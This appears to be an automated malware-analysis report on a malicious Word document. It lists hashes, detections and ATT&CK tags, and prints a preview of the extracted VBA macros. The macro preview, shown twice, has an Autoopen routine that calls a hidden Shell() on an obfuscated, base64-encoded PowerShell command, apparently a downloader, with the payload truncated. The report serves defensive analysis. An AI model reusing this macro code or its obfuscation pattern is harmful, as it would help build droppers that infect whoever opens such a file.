Office (OLE) malware analysis — malicious · ce5de83fdbcf54a2

MALICIOUS

Office (OLE)

110.0 KB Created: 2018-05-29 15:04:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 43beed656321a00db996265178a90822 SHA-1: e2059c04f7dd89530e1b798a0a637832781cccb2 SHA-256: ce5de83fdbcf54a2677fa6e970e7048807f21aaab8717a88f27602df96f2ca46

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an Autoopen function that calls Shell(). The Shell() function is used to execute a PowerShell command. The reconstructed PowerShell command is 'powershell -windowsstyle hidden -e IAAoACgAKAAiAHsAOAA0AH0Ae wAxADAAOAB9AHsAOAA5A fQB7ADYANgB9AHsAM wA3AH0Ae wAxADcAfQB7ADE AMAA2AH0', which is likely responsible for downloading and executing a second-stage payload. This indicates a macro-based downloader attack pattern.

Heuristics 7

ClamAV: Doc.Malware.Juhr-10058934-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Juhr-10058934-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14924 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14924 bytes
SHA-256: `5d89fe795e42f5f08a56670e0c47c1f76c9f3b6faca0dfc42ab9b030e7522867`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WFzFwHrJX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ikRjQniTL() On Error Resume Next nsUGi = Fix(53706 / CSng(80906) * PIltF * RiLms) VhBn = CDate(80578) QPuoiK = Fix(80709 / CSng(93410) * upsDK * BmimLL) VhBn = CDate(83275) ikRjQniTL = wcCAlE + wYoRlGfWI + KjSNAtOAt + aWHaQ + HoiASmATm + VSwccpzz + wnPhLa + wkuSw + bSsFImSYEBJ bIvAT = Fix(40364 / CSng(93111) * jvdXcZ * ERAUP) VhBn = CDate(26536) End Function Sub Autoopen() On Error Resume Next BCNWcY = Fix(16344 / CSng(10987) * UZwTfi * VbEAI) VhBn = CDate(93646) JzXaNvQiJlj (ikRjQniTL) nSbUa = Fix(40111 / CSng(21338) * cCiHsm * sXkaRJ) VhBn = CDate(95960) End Sub Function JzXaNvQiJlj(VvEwopHVzm) On Error Resume Next GmVIis = Fix(21222 / CSng(24733) * EdaEBE * kTczwp) VhBn = CDate(46546) CiIwbo = QjAkW + Shell(ZPHNkBBnX + (Chr(vbKeyP)) + tpVOi + VvEwopHVzm + ZijORNUY, vBhhPvZkj + vbHide + JmJTF) XYjjQh = Fix(60936 / CSng(31504) * oViEMj * RpqCPM) VhBn = CDate(85004) End Function Attribute VB_Name = "TCqzjAhROfkFI" Function wcCAlE() On Error Resume Next lkcbrT = Fix(88585 / CSng(88949) * Xocnf * zuEBoi) VhBn = CDate(39990) JzNNb = "owersHeLL" + " -WinDo" + "wsTyle hid" + "den -e " + "IAAoACgAKAAi" + "AHsAOAA0AH0Ae" + "wAxAD" + "AAOAB9AHsAOAA5A" liPSQQ = Fix(14883 / CSng(10233) * jdZdD * fLXiB) VhBn = CDate(66615) hVJJnWI = "H0AewAxADg" + "AfQB7AD" + "YANgB9AHsAM" + "wA3AH0Ae" + "wAxADcAfQB7" ESYMQ = Fix(19807 / CSng(60418) * RHQtr * cAdiFS) VhBn = CDate(39776) mRFzoVfzcbF = "ADIANQ" + "B9AHsAN" + "QA2AH0Aew" + "A5ADkAfQB7ADE" + "AMAA2AH0" KFLuVZ = Fix(81817 / CSng(32307) * TIliw * EzzZKS) VhBn = CDate(42856) JlPtsd = "AewA0ADcA" + "fQB7ADEAMwAwA" + "H0AewA" + "0AH0AewA" + "2ADQAf" + "QB7AD" + "EAMgAwAH" + "0AewA4ADUAfQ" + "B7ADcANgB9AHsAO" + "AAzAH0AewA" jMjDK = Fix(88221 / CSng(537) * QfLISA * oGTAH) VhBn = CDate(93806) ZUZAmofrZ = "zADMAfQB7ADEAM" + "gA5AH0Ae" + "wA5AD" + "cAfQB7ADEAMQ" + "A0AH0AewAxADkAf" + "QB7ADkAN" + "gB9AHsAN" + "wB9AHsAMQAwADMA" + "fQB7ADEAMA" + "A1AH0" FNfGZi = Fix(15649 / CSng(85509) * anwbi * VfWzXr) VhBn = CDate(10636) WwLKsiciqL = "AewA2ADAA" + "fQB7ADIAMAB9AHs" + "AOQAzAH0AewAxAD" + "UAfQB7ADgANwB9A" + "HsANAAy" + "AH0AewA1ADEA" + "fQB7ADcANAB9" obDiI = Fix(37786 / CSng(83029) * OMwGS * EUWnX) VhBn = CDate(40843) ACGPTzzXnjd = "AHsANwA5AH" + "0AewAxADAAOQB" + "9AHsANw" + "A1AH0AewAx" + "ADEAMQB9AHsAMgA" + "zAH0AewA0A" + "DEAfQB7A" + "DAAfQB7AD" + "IANgB9AHsAM" UWZnAk = Fix(75937 / CSng(57005) * ZtAuq * WzzYTI) VhBn = CDate(48173) KzjjQFTnmEi = "gAxAH0Aew" + "A1ADkA" + "fQB7AD" + "EAMgA0AH0" + "AewAxADAAMAB9A" dbWwbC = Fix(56852 / CSng(69513) * khUEi * IjDoHn) VhBn = CDate(8466) joNhLCmm = "HsAMQ" + "AzAH0AewA0ADQ" + "AfQB7ADYAO" + "QB9AHs" + "AMwAxAH" + "0AewA0" + "ADMAfQB7ADIANw" + "B9AHsANQA" + "wAH0Aew" + "AxADIANwB9AHs" XhZwW = Fix(76851 / CSng(98057) * cvmvL * mMbioZ) VhBn = CDate(30937) jETjR = "AMgA5AH" + "0AewA5AH0AewA5A" + "DAAfQB7ADkANA" + "B9AHsAMgA0AH0A" + "ewA0ADAAf" + "QB7ADEAMQA5AH0" + "AewA1A" wcCAlE = JzNNb + hVJJnWI + mRFzoVfzcbF + JlPtsd + ZUZAmofrZ + WwLKsiciqL + ACGPTzzXnjd + KzjjQFTnmEi + joNhLCmm + jETjR End Function Function wYoRlGfWI() On Error Resume Next VarIr = Fix(79871 / CSng(29889) * RwYVw * CEHwU) VhBn = CDate(65931) hTBZr = "DgAfQB" + "7ADcAMQB9A" + "HsANAA2A" + "H0AewAyADIAfQB" + "7ADYANQB9AHsAN" ZSifi = Fix(94314 / CSng(83375) * dwipK * wGNwJ) VhBn = CDate(73979) CRGXYHakAzE = "gAxAH0AewA3A" + "DAAfQ" + "B7ADQAOQB9AHsAM" + "QAyADEAfQB7AD" + "cAOAB9AHsAMQ" + "AxADgAfQ" + "B7ADMANg" + "B9AHsAMQAyAH0Ae" + "wA4ADgA" + "fQB7ADEANgB9AH" dpWpf = Fix(40779 / CSng(19604) * WsEhI * IJcMsY) VhBn = CDate(14348) bGFuhiKDYZ = "sANQA" + "yAH0Ae" + "wA1ADMAfQ" + "B7ADMAf" + "QB7ADgANg" + "B9AHsAMQAwADcA" zujoFD = Fix(96129 / CSng(86965) * LvzwcL * zbhqGF) VhBn = CDate(49136) miickwltGit = "fQB7A" + "DEAMQA3AH0" ... (truncated)

SHA-256: 5d89fe795e42f5f08a56670e0c47c1f76c9f3b6faca0dfc42ab9b030e7522867

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WFzFwHrJX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ikRjQniTL()
On Error Resume Next
nsUGi = Fix(53706 / CSng(80906) * PIltF * RiLms)
VhBn = CDate(80578)
QPuoiK = Fix(80709 / CSng(93410) * upsDK * BmimLL)
VhBn = CDate(83275)
ikRjQniTL = wcCAlE + wYoRlGfWI + KjSNAtOAt + aWHaQ + HoiASmATm + VSwccpzz + wnPhLa + wkuSw + bSsFImSYEBJ
bIvAT = Fix(40364 / CSng(93111) * jvdXcZ * ERAUP)
VhBn = CDate(26536)
End Function
Sub Autoopen()
On Error Resume Next
BCNWcY = Fix(16344 / CSng(10987) * UZwTfi * VbEAI)
VhBn = CDate(93646)
JzXaNvQiJlj (ikRjQniTL)
nSbUa = Fix(40111 / CSng(21338) * cCiHsm * sXkaRJ)
VhBn = CDate(95960)
End Sub
Function JzXaNvQiJlj(VvEwopHVzm)
On Error Resume Next
GmVIis = Fix(21222 / CSng(24733) * EdaEBE * kTczwp)
VhBn = CDate(46546)
CiIwbo = QjAkW + Shell(ZPHNkBBnX + (Chr(vbKeyP)) + tpVOi + VvEwopHVzm + ZijORNUY, vBhhPvZkj + vbHide + JmJTF)
XYjjQh = Fix(60936 / CSng(31504) * oViEMj * RpqCPM)
VhBn = CDate(85004)
End Function


Attribute VB_Name = "TCqzjAhROfkFI"
Function wcCAlE()
On Error Resume Next
lkcbrT = Fix(88585 / CSng(88949) * Xocnf * zuEBoi)
VhBn = CDate(39990)
JzNNb = "owersHeLL" + " -WinDo" + "wsTyle hid" + "den -e " + "IAAoACgAKAAi" + "AHsAOAA0AH0Ae" + "wAxAD" + "AAOAB9AHsAOAA5A"
liPSQQ = Fix(14883 / CSng(10233) * jdZdD * fLXiB)
VhBn = CDate(66615)
hVJJnWI = "H0AewAxADg" + "AfQB7AD" + "YANgB9AHsAM" + "wA3AH0Ae" + "wAxADcAfQB7"
ESYMQ = Fix(19807 / CSng(60418) * RHQtr * cAdiFS)
VhBn = CDate(39776)
mRFzoVfzcbF = "ADIANQ" + "B9AHsAN" + "QA2AH0Aew" + "A5ADkAfQB7ADE" + "AMAA2AH0"
KFLuVZ = Fix(81817 / CSng(32307) * TIliw * EzzZKS)
VhBn = CDate(42856)
JlPtsd = "AewA0ADcA" + "fQB7ADEAMwAwA" + "H0AewA" + "0AH0AewA" + "2ADQAf" + "QB7AD" + "EAMgAwAH" + "0AewA4ADUAfQ" + "B7ADcANgB9AHsAO" + "AAzAH0AewA"
jMjDK = Fix(88221 / CSng(537) * QfLISA * oGTAH)
VhBn = CDate(93806)
ZUZAmofrZ = "zADMAfQB7ADEAM" + "gA5AH0Ae" + "wA5AD" + "cAfQB7ADEAMQ" + "A0AH0AewAxADkAf" + "QB7ADkAN" + "gB9AHsAN" + "wB9AHsAMQAwADMA" + "fQB7ADEAMA" + "A1AH0"
FNfGZi = Fix(15649 / CSng(85509) * anwbi * VfWzXr)
VhBn = CDate(10636)
WwLKsiciqL = "AewA2ADAA" + "fQB7ADIAMAB9AHs" + "AOQAzAH0AewAxAD" + "UAfQB7ADgANwB9A" + "HsANAAy" + "AH0AewA1ADEA" + "fQB7ADcANAB9"
obDiI = Fix(37786 / CSng(83029) * OMwGS * EUWnX)
VhBn = CDate(40843)
ACGPTzzXnjd = "AHsANwA5AH" + "0AewAxADAAOQB" + "9AHsANw" + "A1AH0AewAx" + "ADEAMQB9AHsAMgA" + "zAH0AewA0A" + "DEAfQB7A" + "DAAfQB7AD" + "IANgB9AHsAM"
UWZnAk = Fix(75937 / CSng(57005) * ZtAuq * WzzYTI)
VhBn = CDate(48173)
KzjjQFTnmEi = "gAxAH0Aew" + "A1ADkA" + "fQB7AD" + "EAMgA0AH0" + "AewAxADAAMAB9A"
dbWwbC = Fix(56852 / CSng(69513) * khUEi * IjDoHn)
VhBn = CDate(8466)
joNhLCmm = "HsAMQ" + "AzAH0AewA0ADQ" + "AfQB7ADYAO" + "QB9AHs" + "AMwAxAH" + "0AewA0" + "ADMAfQB7ADIANw" + "B9AHsANQA" + "wAH0Aew" + "AxADIANwB9AHs"
XhZwW = Fix(76851 / CSng(98057) * cvmvL * mMbioZ)
VhBn = CDate(30937)
jETjR = "AMgA5AH" + "0AewA5AH0AewA5A" + "DAAfQB7ADkANA" + "B9AHsAMgA0AH0A" + "ewA0ADAAf" + "QB7ADEAMQA5AH0" + "AewA1A"
wcCAlE = JzNNb + hVJJnWI + mRFzoVfzcbF + JlPtsd + ZUZAmofrZ + WwLKsiciqL + ACGPTzzXnjd + KzjjQFTnmEi + joNhLCmm + jETjR
End Function
Function wYoRlGfWI()
On Error Resume Next
VarIr = Fix(79871 / CSng(29889) * RwYVw * CEHwU)
VhBn = CDate(65931)
hTBZr = "DgAfQB" + "7ADcAMQB9A" + "HsANAA2A" + "H0AewAyADIAfQB" + "7ADYANQB9AHsAN"
ZSifi = Fix(94314 / CSng(83375) * dwipK * wGNwJ)
VhBn = CDate(73979)
CRGXYHakAzE = "gAxAH0AewA3A" + "DAAfQ" + "B7ADQAOQB9AHsAM" + "QAyADEAfQB7AD" + "cAOAB9AHsAMQ" + "AxADgAfQ" + "B7ADMANg" + "B9AHsAMQAyAH0Ae" + "wA4ADgA" + "fQB7ADEANgB9AH"
dpWpf = Fix(40779 / CSng(19604) * WsEhI * IJcMsY)
VhBn = CDate(14348)
bGFuhiKDYZ = "sANQA" + "yAH0Ae" + "wA1ADMAfQ" + "B7ADMAf" + "QB7ADgANg" + "B9AHsAMQAwADcA"
zujoFD = Fix(96129 / CSng(86965) * LvzwcL * zbhqGF)
VhBn = CDate(49136)
miickwltGit = "fQB7A" + "DEAMQA3AH0" 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.